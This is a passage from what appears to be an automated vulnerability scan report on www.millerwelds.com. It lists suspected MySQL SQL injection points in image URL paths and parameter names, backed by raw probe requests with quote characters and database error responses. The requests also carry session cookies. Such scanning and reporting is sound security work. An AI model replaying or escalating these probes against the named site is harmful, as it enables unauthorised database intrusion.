The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /financing/images/powerline_bg.png' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/?int_source=/products/accessories/international/&int_medium=bannerad&int_content=blackspace&int_campaign=powerline
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; _chartbeat2=rr9pb9n2shhrzr4o; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; __utmb=94003201.10.10.1303147760

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:31:51 GMT
Connection: Keep-Alive
Content-Length: 27752

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/financing/images/powerline_bg.png''' at line 1)<br>
...[SNIP]...

Request 2

GET /financing/images/powerline_bg.png'' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/?int_source=/products/accessories/international/&int_medium=bannerad&int_content=blackspace&int_campaign=powerline
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; _chartbeat2=rr9pb9n2shhrzr4o; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; __utmb=94003201.10.10.1303147760

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:31:52 GMT
Connection: Keep-Alive
Content-Length: 29417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
1.54. http://www.millerwelds.com/financing/images/powerline_bg.png [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /financing/images/powerline_bg.png

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /financing/images/powerline_bg.png?1'=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/?int_source=/products/accessories/international/&int_medium=bannerad&int_content=blackspace&int_campaign=powerline
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; _chartbeat2=rr9pb9n2shhrzr4o; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; __utmb=94003201.10.10.1303147760

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:31:44 GMT
Connection: Keep-Alive
Content-Length: 27720

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /financing/images/powerline_bg.png?1''=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/?int_source=/products/accessories/international/&int_medium=bannerad&int_content=blackspace&int_campaign=powerline
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; _chartbeat2=rr9pb9n2shhrzr4o; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; __utmb=94003201.10.10.1303147760

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:31:45 GMT
Connection: Keep-Alive
Content-Length: 29417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
1.55. http://www.millerwelds.com/images/footer-bootm-bg.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /images/footer-bootm-bg.jpg

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /images'/footer-bootm-bg.jpg?9 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:07 GMT
Connection: Keep-Alive
Content-Length: 27711

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?9'' at line 1)<br>
...[SNIP]...
1.56. http://www.millerwelds.com/images/footer-bootm-bg.jpg [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /images/footer-bootm-bg.jpg

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /images/footer-bootm-bg.jpg'?9 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:09 GMT
Connection: Keep-Alive
Content-Length: 27710

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?9'' at line 1)<br>
...[SNIP]...
1.57. http://www.millerwelds.com/images/footer-top-bg.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /images/footer-top-bg.jpg

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /images'/footer-top-bg.jpg?2 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:07 GMT
Connection: Keep-Alive
Content-Length: 27709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?2'' at line 1)<br>
...[SNIP]...
1.58. http://www.millerwelds.com/images/footer-top-bg.jpg [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /images/footer-top-bg.jpg

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /images/footer-top-bg.jpg'?2 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:09 GMT
Connection: Keep-Alive
Content-Length: 27708

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?2'' at line 1)<br>
...[SNIP]...
1.59. http://www.millerwelds.com/images/header-background.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /images/header-background.jpg

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /images'/header-background.jpg?3 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:11 GMT
Connection: Keep-Alive
Content-Length: 27713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?3'' at line 1)<br>
...[SNIP]...
1.60. http://www.millerwelds.com/images/header-background.jpg [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /images/header-background.jpg

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /images/header-background.jpg'?3 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:14 GMT
Connection: Keep-Alive
Content-Length: 27712

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?3'' at line 1)<br>
...[SNIP]...
1.61. http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:28:58 GMT
Connection: Keep-Alive
Content-Length: 27875

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arro' at line 1)<br>
...[SNIP]...

Request 2

GET /landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif'' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:28:59 GMT
Connection: Keep-Alive
Content-Length: 29444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
1.62. http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif?1'=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:28:48 GMT
Connection: Keep-Alive
Content-Length: 27800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif?1''=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:28:49 GMT
Connection: Keep-Alive
Content-Length: 29444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
1.63. http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/products/weldinghelmets/images/arrow_up.gif [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/products/weldinghelmets/images/arrow_up.gif

Issue detail

The REST URL parameter 9 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 9, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/products/weldinghelmets/images/arrow_up.gif' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif'
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.5.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:22 GMT
Connection: Keep-Alive
Content-Length: 27906

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/prod' at line 1)<br>
...[SNIP]...

Request 2

GET /landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/products/weldinghelmets/images/arrow_up.gif'' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif'
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
